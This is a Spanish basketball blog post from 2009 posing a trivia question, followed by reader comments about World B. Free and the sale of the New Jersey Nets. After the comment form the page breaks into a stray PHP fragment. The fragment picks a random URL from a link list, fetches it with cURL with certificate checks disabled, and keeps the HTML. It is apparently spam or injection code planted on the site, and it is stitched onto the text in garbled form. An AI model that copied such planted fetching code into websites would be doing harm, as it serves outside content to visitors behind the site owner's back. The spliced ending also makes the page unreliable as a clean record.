Trivial #6

22 de September de 2009 por txusma

5 pasos fueron los mínimos que encontramos para unir a dos jugadores tan separados en el tiempo como Devin Harris y Oscar Robertson. Hector fue el primero utilizando a Bob Dandridge (el tercer espada de aquellos Bucks campeones del 71), Sidney Moncrief (el mejor jugador de los Bucks en la decada de los 80) y el abuelo Kevin Willis. Sergio (¿quién si no?) también encontró otra cadena de 5 formada por Kareem Abdul-Jabbar, AC Green y Dirk Nowitzki, aparte de los 2 extremos.

Volveremos a hacer preguntas de este estilo pero añadiéndole un grado extra de dificultad, como por ejemplo encontrar la cadena mínima con el mayor número de anillos. Seguro que da para horas de diversión.

Y ahora vamos a por la sexta pregunta:¿Qué jugador de baloncesto se llama (o llamaba) igual que una canción de Keith Murray?

Hector entra en nuestra clasificación del trivial que sigue comandada por Sergio:

Sergio 3
Rojorob 1
Hector 1

Comenta

15 comentarios a esta entrada

  1. univerzee dice:
    #1

    La verdad es que no se como se juega a esto, pero me parece que el tipo es World Be Free. Canción nº13 del album Enigma. Y el tipo un jugador de HOU, http://es.wikipedia.org/wiki/World_B._Free
    Bueno, ya esta?

      Citar

  2. Héctor dice:
    #2

    Nada, se me han adelantado 🙁

      Citar

  3. sergio dice:
    #3

    jue! si q se adelantan si… aqui no se puede despistar uno ni un minuto o ya mismo me quitan el primer puesto…. habra que programarse una alerta cuando se de una entrada nueva en el blog xD
    por cierto… ese “¿quien si no?” me ha sonado a q me hago cansino jajaja… pero es q a mi este tipo de juegos me gusta bastante

      Citar

  4. Txusma dice:
    #4

    Te prometo que no quería indicar cansancio sino respeto. De verdad que me dejáis a cuadro no por responder las preguntas sino por la velocidad en que lo hacéis.
    ¿En serio alguien se acordaba de World B. Free?

      Citar

  5. Kiki dice:
    #5

    Yo sí me acuerdo, era calvete menos por atrás, llevaba el 21 en aquellos Rockets de los 80 y se cambió el nombre a World B. Free (en la camiseta “Free”) creo que porque era eologista y pacifista militante. Un base correcto con un tiro algo extraño desde atrás y buen pasador, botaba muy bajo, a la antigua usanza. Qué personaje. La respuesta sí que no tenía ni idea.

      Citar

  6. univerzee dice:
    #6

    Sinceramente no sabia ni quien era el cantante, busque su discografia y mire los titulos, pero a World B Free si me lo conocia, más que nada por un primer NBA Today cuando la NBA empezaba en Tve, y salia el metiendo canastas al estilo Gallis creo que contra Sacramento. Tengo aún ese NBAToday grabado.

      Citar

  7. TheDeerHunter dice:
    #7

    Yo lo conocía de la final de Walton, en la que él jugaba con los Sixers
    era un tipo chuponcete que llegó a marcarse los 30 por partido cuando jugó en los Clippers… de San diego

    Al que no conocía es al pájaro ese de la canción

      Citar

  8. Óscar dice:
    #8

    Lo he visto ahora en la wiki y el tío crack de World B. Free (nacido como Lloyd Bernard Free), en sus 13 años en la NBA promedió 20,3 puntos, 3,7 asistencias y 2,7 rebotes por partido, figurando en la actualidad entre los 50 mejores anotadores de la historia de la NBA. Eso sí que no me lo sabía…
    Lo he visto en videos con Sixers y Rockets, pero en HOU jugó sólo la 1987/88 (58 partidos, ninguno como titular), tras la cual se retiró. Dice la wiki que lleva años como Embajador del Baloncesto para los Sixers, siendo nombrado en 2006 Director de Desarrollo de Jugadores del equipo.
    En la 79/80 jugó su único All-Star, cuando promedió con los Clippers de San Diego 30.2 puntos como decía DeerHunter, segundo máximo anotador tras “Iceman”. Jugó en PHI, San Diego, GSW, CLE, de nuevo una campaña en PHI y HOU.
    Vaya fenómeno, con su calva y su barbeja…

      Citar

  9. NBA LAKERS BLOG dice:
    #9

    Te juro que busqué la info y no encontré lo de Murray =( jeje…

    Esta muy bueno el juego, a ver si para la proxima adivino la pregunta…

    Pasate por nuestro blog de los Lakers!

    Un abrazo!

    –NM–

      Citar

  10. Txusma dice:
    #10

    Vaya cracks estáis hechos!!

      Citar

  11. L.Casei dice:
    #11

    Qué frío me he quedado al leer esto: “Matt Harpring se plantea su retirada de las pistas si no supera los problemas físicos que no le abandonan en los últimos tiempos”. Con las ganas que tenía de verlo repartir estopa y llegando al rebote ofensivo contra el Madrid el 12 de octubre…
    Otra noticia que da que pensar: El millonario industrial Mikhail Prokhorov ha llegado a un acuerdo para comprar el 80% de las acciones de los New Jersey Nets a cambio de cerca de 200 millones de dólares.
    Joder con los rusos y su gas y su petróleo…

      Citar

  12. toni dice:
    #12

    L.Casei te me has adelantado, que os parece lo de los Nets? Entre los jeques y los magnates rusos, se van a apoderar de los deportes reyes. Siempre habia tenido la idea que la NBA era un simbolo Made in America and for Americans y que era muy dificil formar parte (Tenias que destacar en Europa) pero lo del refran parece que es verdad, pagando, san pedro canta…

      Citar

  13. Héctor dice:
    #13

    Lo del magnate ruso es algo que se veía venir, y que no es más que el signo de los tiempos. La crisis económica mundial afecta sobretodo al sector del ladrillo, y lo de los Nets es algo que se veía venir desde hacía tiempo. El señor Prokhorov tiene dinero para aburrir (debido a los minerales, no al gas ni al petróleo) y ganas de meter la cabeza en la NBA como ya la tiene metida en Europa con el CSKA. No creo que sea algo malo, así de entrada. La NBA ya hace tiempo que dejó de ser un deporte sólo para los americanos, y tampoco sería de extrañar que pronto veamos al primer entrenador extranjero en los banquillos (¿He oído Messina?)

    Un saludo.

      Citar

  14. TheDeerHunter dice:
    #14

    Se daba por hecho lo del traslado a Brooklyn… ¿qué pasará con ese tema ahora??

      Citar

  15. Óscar dice:
    #15

    Yo creo que eso sigue adelante, creo que están construyendo incluso la “Arena” en una buena zona de Brooklyn, aunque con un presupuesto más bajo de lo que habían pensado, por la crisis. Lo que tiene ahora este ruso es el control de la franquicia, como tal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>